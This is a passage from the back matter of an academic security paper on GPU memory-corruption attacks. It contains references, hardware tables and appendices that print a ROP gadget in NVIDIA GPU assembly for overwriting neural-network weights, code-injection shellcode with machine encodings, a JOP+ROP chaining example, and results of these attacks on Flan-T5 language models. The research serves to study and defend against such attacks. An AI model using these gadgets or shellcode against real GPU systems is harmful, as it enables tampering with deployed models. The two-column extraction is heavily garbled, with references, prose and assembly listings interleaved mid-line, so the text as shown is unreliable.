GPU and CPU accelerated mining of cryptocurrencies eration of numerical weather prediction. In 2008 IEEE
and their financial analysis. In 2nd International Confer- International Symposium on Parallel and Distributed
ence on I-SMAC (IoT in Social, Mobile, Analytics and Processing, 2008.
Cloud), 2018.
[38] Andrea Miele. Buffer overflow vulnerabilities in CUDA:
[29] Myeongjae Jeon, Shivaram Venkataraman, Amar Phan- a preliminary analysis. Journal of Computer Virology
ishayee, Junjie Qian, Wencong Xiao, and Fan Yang. and Hacking Techniques, 12:113–120, 2016.
Analysis of Large-Scale Multi-Tenant GPU clusters for [39] M Miller. Trends, challenges, and strategic shifts in the
DNN training workloads. In USENIX Annual Technical software vulnerability mitigation landscape. 2019.
Conference (ATC), 2019.
[40] NVIDIA. Compute sanitizer. Available at https:
[30] Yimin Jiang, Yibo Zhu, Chang Lan, Bairen Yi, Yong //docs.nvidia.com/cuda/compute-sanitizer/
Cui, and Chuanxiong Guo. A unified architecture for index.html.
accelerating distributed DNN training in heterogeneous
GPU/CPU clusters. In 14th USENIX Symposium on [41] NVIDIA. CUDA C++ programming guide. Available
Operating Systems Design and Implementation (OSDI), at https://docs.nvidia.com/cuda/pdf/CUDA_C_
2020. Programming_Guide.pdf.
[42] NVIDIA. NVIDIA Grace Hopper Superchip. Available
[31] Yonghae Kim, Jaekyu Lee, and Hyesoon Kim. at https://www.nvidia.com/en-us/data-center/
Hardware-based always-on heap memory safety. In grace-hopper-superchip/.
53rd Annual IEEE/ACM International Symposium on
Microarchitecture (MICRO), 2020. [43] NVIDIA. NVLink and NVSwitch. Available at https:
//www.nvidia.com/en-us/data-center/nvlink.
[32] Albert Kwon, Udit Dhawan, Jonathan M Smith,
Thomas F Knight Jr, and Andre DeHon. Low-fat point- [44] NVIDIA. Parallel thread execution ISA version
ers: Compact encoding and efficient gate-level imple- 8.2. Available at https://docs.nvidia.com/cuda/
mentation of fat pointers for spatial safety and capability- parallel-thread-execution/index.html.
based security. In Proceedings of the ACM SIGSAC [45] NVIDIA. Pascal MMU format changes. Available
conference on Computer & communications security at https://nvidia.github.io/open-gpu-doc/
(CCS), 2013. pascal/gp100-mmu-format.pdf.
[33] Jaewon Lee, Yonghae Kim, Jiashen Cao, Euna Kim, [46] NVIDIA. Tuning CUDA applications for
Jaekyu Lee, and Hyesoon Kim. Securing GPU via NVIDIA Ampere GPU architecture. Avail-
region-based bounds checking. In Proceedings of the able at https://docs.nvidia.com/cuda/
49th Annual International Symposium on Computer Ar- ampere-tuning-guide/index.html.
chitecture (ISCA), 2022.
[47] Jay H Park, Gyeongchan Yun, M Yi Chang, Nguyen T
[34] Tao Liao, Yongjie Zhang, Peter M Kekenes-Huskey, Nguyen, Seungmin Lee, Jaesik Choi, Sam H Noh, and
Yuhui Cheng, Anushka Michailova, Andrew D McCul- Young-ri Choi. HetPipe: Enabling large DNN training
loch, Michael Holst, and J Andrew McCammon. Multi- on (whimpy) heterogeneous GPU clusters through inte-
core CPU or GPU-accelerated multiscale modeling for gration of pipelined model parallelism and data paral-
biomolecular complexes. Computational and Mathe- lelism. In USENIX Annual Technical Conference (ATC),
matical Biophysics, 1(2013):164–179, 2013. 2020.
[48] Sang-Ok Park, Ohmin Kwon, Yonggon Kim, Sang Kil
[35] Ze Liu, Yutong Lin, Yue Cao, Han Hu, Yixuan Wei, Cha, and Hyunsoo Yoon. Mind control attack: Under-
Zheng Zhang, Stephen Lin, and Baining Guo. Swin mining deep learning with GPU memory exploitation.
transformer: Hierarchical vision transformer using Computers & Security, 102:102115, 2021.
shifted windows. In Proceedings of the IEEE/CVF
international conference on computer vision (ICCV), [49] Adam Paszke, Sam Gross, Francisco Massa, Adam
2021. Lerer, James Bradbury, Gregory Chanan, Trevor Killeen,
Zeming Lin, Natalia Gimelshein, Luca Antiga, et al. Py-
[36] Frank Luna. Introduction to 3D Game Programming torch: An imperative style, high-performance deep learn-
with DirectX 12. Mercury Learning and Information, ing library. Advances in neural information processing
2016. systems, 32, 2019.
4048 33rd USENIX Security Symposium USENIX Association
[50] Ryan Roemer, Erik Buchanan, Hovav Shacham, and Ste- Table 4: The complete list of tested GPUs.
fan Savage. Return-oriented programming: Systems,
languages, and applications. ACM Transactions on In- Architecture GPU Model
Volta Tesla V100
formation and System Security (TISSEC), 15(1), 2012. Turing GeForce RTX 2070
Ampere GeForce RTX 3080
[51] Doaa Abdul-Hakim Shehab and Omar Abdullah Batarfi. Ampere A100
RCR for preventing stack smashing attacks bypass stack Ada Lovelace GeForce RTX 4090
canaries. In 2017 Computing Conference, 2017.
[52] Haichen Shen, Lequn Chen, Yuchen Jin, Liangyu Zhao, B ROP Gadgets
Bingyu Kong, Matthai Philipose, Arvind Krishnamurthy,
and Ravi Sundaram. Nexus: A GPU cluster engine for An example of the ROP gadget in Section 5 is shown in
accelerating DNN-based video analysis. In Proceed- Listing 6. Each execution of this gadget modifies a weight
ings of the 27th ACM Symposium on Operating Systems value, and we execute it repeatedly to modify multiple weights.
Principles (SOSP), 2019. Specifically, we prepare the stack so that each time the gadget
executes, two conditions are met: 1) the address of the first
[53] Dave Shreiner and The Khronos OpenGL ARB Work- instruction in the gadget is stored at [R1+0x18] and is thus
ing Group. OpenGL Programming Guide: The Offi- loaded into R20; 2) the address of the next weight is stored at
cial Guide to Learning OpenGL, Versions 3.0 and 3.1. [R1+0x38] and is thus loaded into R28. Consequently, each
Addison-Wesley Professional, 7th edition, 2009. execution of this gadget first modifies a weight value using
the ST instruction, then updates R28 to the address of the next
[54] Karen Simonyan and Andrew Zisserman. Very deep con- weight, and finally returns to the start of the gadget to modify
volutional networks for large-scale image recognition. the subsequent weight. If there are a large number of weights
arXiv preprint arXiv:1409.1556, 2014. to modify and the stack size is insufficient to support the
repeated execution of this gadget, we use multiple malicious
[55] Nikko Ström. Scalable distributed dnn training using user requests—and thus multiple ROP attacks—to complete
commodity GPU cloud computing. 2015. the task.
[56] Peng Sun, Wansen Feng, Ruobing Han, Shengen Yan,
ST.E.64 [R28.64], R4 ;
and Yonggang Wen. Optimizing network performance BSYNC B7 ;
for distributed DNN training on GPU clusters: Ima- LDL R0, [R1] ;
BMOV.32 B6, R27 ;
genet/Alexnet training in 1.5 minutes. arXiv preprint LDL R20, [R1+0x18] ;
arXiv:1902.06855, 2019. LDL R21, [R1+0x1c] ;
LDL R2, [R1+0x4] ;
LDL R16, [R1+0x8] ;
[57] Mohamed Tarek Ibn Ziad, Sana Damani, Aamer Jaleel, ...
Stephen W Keckler, and Mark Stephenson. cuCatch: A LDL R19, [R1+0x14] ;
LDL R22, [R1+0x20] ;
debugging tool for efficiently catching memory safety ...
violations in CUDA applications. In Proceedings of the LDL R29, [R1+0x3c] ;
IADD3 R1, R1, 0x40, RZ ;
ACM on Programming Languages (PLDI), 2021. BMOV.32 B7, R0 ;
RET.ABS.NODEC R20 0x0 ;
[58] Zhenkai Zhang, Tyler Allen, Fan Yao, Xing Gao, and
Listing 6: An example ROP gadget.
Rong Ge. Tunnels for bootlegging: Fully reverse-
engineering GPU TLBs for challenging isolation guaran-
tees of NVIDIA MIG. In ACM SIGSAC Conference on
Computer and Communications Security (CCS), 2023. C Shellcode
[59] Mohamed Tarek Ibn Ziad, Miguel A Arroyo, Evgeny
Manzhosov, Ryan Piersma, and Simha Sethumadhavan. An example of the shellcode used in the code injection at-
No-fat: Architectural support for low overhead memory tack is shown in Table 7. It writes the value 0xffffffff
safety checks. In ACM/IEEE 48th Annual International to a range of memory addresses, from 0x7fffdeadbeef to
Symposium on Computer Architecture (ISCA), 2021. 0x7fffdeadbeef+0xaaaa.
A GPU List D System Specifications
Table 4 lists all the GPUs on which we have verified the The cloud system used for the experiments in Section 5 is
conclusions presented in Section 4. specified in Table 5.
USENIX Association 33rd USENIX Security Symposium 4049
Table 5: Platform details. Table 7: An example shellcode.
CPU Intel Xeon Silver 4114
Hypervisor KVM on Ubuntu 20.04 /* 0000 */ MOV R0, 0xffffffff ;
Virtual machine Ubuntu 20.04 /* 0xffffffff00007802 */
GPU NVIDIA A100 /* 0x003fde0000000f00 */
GPU architecture Ampere /* 0010 */ MOV R4, 0xdeadbeef ;
vGPU version 15.4 /* 0xdeafbeef00047802 */
vGPU license vWS /* 0x003fde0000000f00 */
vGPU memory 40GB
/* 0020 */ MOV R5, 0x7fff ;
CUDA version 12.4
/* 0x00007fff00057802 */
/* 0x003fde0000000f00 */
/* 0030 */ MOV R3, RZ ;
E LLM Attacks /* 0x000000ff00037202 */
/* 0x003fde0000000f00 */
We test the memory corruption attacks, including the code /* 0040 */ MOV R6, R3 ;
injection attack and the ROP attack, on three LLMs, Flan-T5- /* 0x0000000300067202 */
/* 0x003fde0000000f00 */
Small, Flan-T5-Base, and Flan-T5-Large [5]. We assume a /* 0050 */ MOV R3, R6 ;
buffer overflow vulnerability in the data pre-processing stage /* 0x0000000600037202 */
(e.g., for noise removing [6]), similar to the one assumed in /* 0x003fde0000000f00 */
Section 5. /* 0060 */ ISETP.LT.AND P0, PT, R3, 0xaaaa, PT ;
/* 0x0000aaaa0300780c */
Table 6: The LLM inference accuracy (with MMLU [27]) /* 0x003fde0003f01270 */
/* 0070 */ PLOP3.LUT P0, PT, P0, PT, PT, 0x8, 0x0 ;
after the weight modification attacks.
/* 0x000000000000781c */
DNN Model Clean acc. Uncontrolled Weight modification /* 0x003fde000070e170 */
10% 20% 50% 100% /* 0080 */ @P0 BRA 0x150 ;
Flan-T5-Small 29.5% 29.2% 28.6% 28.3% 28.2% /* 0x000000c000000947 */
Flan-T5-Base 34.2% 33.2% 32.6% 28.9% 29.5% /* 0x003fde0003800000 */
Flan-T5-Large 42.0% 41.3% 40.5% 39.1% 35.0% /* 0090 */ MOV R6, R3 ;
/* 0x0000000300067202 */
Similar to the attacks on the vision models (cf. Section 5), /* 0x003fde0000000f00 */
the code injection attack (with controlled written values) can /* 00a0 */ SHF.R.S32.HI R7, RZ, 0x1f, R6 ;
/* 0x0000001fff077819 */
reduce the accuracy of the LLMs to the same level of random /* 0x003fde0000011406 */
guessing. However, as shown in Table 6, the ROP attack, /* 00b0 */ SHF.L.U64.HI R7, R6, 0x2, R7 ;
where the written value is not controlled by the attacker, has /* 0x0000000206077819 */
a limited effect on the accuracy of the LLMs. /* 0x003fde0000010207 */
/* 00c0 */ SHF.L.U32 R6, R6, 0x2, RZ ;
/* 0x0000000206067819 */
/* 0x003fde00000006ff */
F JOP+ROP Attack /* 00d0 */ MOV R10, R4 ;
/* 0x00000004000a7202 */
An example of combining JOP and ROP gadgets is shown in /* 0x003fde0000000f00 */
Figure 8. Here we assume that R4 contains the address of the /* 00e0 */ MOV R11, R5 ;
/* 0x00000005000b7202 */
helper gadget, which is used to chain the JOP gadgets (with
/* 0x003fde0000000f00 */
the ROP gadgets). Every time after executing a JOP gadget, /* 00f0 */ IADD3 R6, P0, R10, R6, RZ ;
it jumps to the helper gadget, which then pops the address of /* 0x000000060a067210 */
the next gadget from the stack and returns to it. /* 0x003fde0007f1e0ff */
/* 0100 */ IADD3.X R7, R11, R7, RZ, P0, !PT ;
/*payload*/
LDL R20, [R1+0x18] ;
/* 0x000000070b077210 */
LDL R21, [R1+0x1c] ; /* 0x003fde00007fe4ff */
…
IADD R1, R1, 0x40, RZ ; /* 0110 */ ST.E [R6.64], R0 ;
RET.ABS.NODEC R20 0x0 ;
/* 0x0000000006007985 */
/*payload*/
/* 0x0033de000c101904 */
BRX R4 0x0 ; /* 0120 */ IADD3 R6, R3, 0x1, RZ ;
/* 0x0000000103067810 */
LDL R20, [R1+0x10] ;
LDL R21, [R1+0x14] ; /*payload*/
/* 0x003fde0007ffe0ff */
... BRX R4 0x0 ;
IADD R1, R1, 0x30, RZ ;
/* 0130 */ MOV R7, R6 ;
RET.ABS.NODEC R20 0x0 ; /* 0x0000000600077202 */
/*payload*/ /* 0x003fde0000000f00 */
helper gadget LDL R20, [R1+0x10] ;
LDL R21, [R1+0x14] ; /* 0140 */ BRA 0x160 ;
…
IADD R1, R1, 0x30, RZ ;
/* 0xffffff0000007947 */
RET.ABS.NODEC R20 0x0 ; /* 0x003fde000383ffff */
/* 0150 */ EXIT ;
Figure 8: An example of combining JOP and ROP, assuming /* 0x000000000000794d */
that R4 contains the address of the helper gadget. /* 0x003fde0003800000 */
4050 33rd USENIX Security Symposium USENIX Association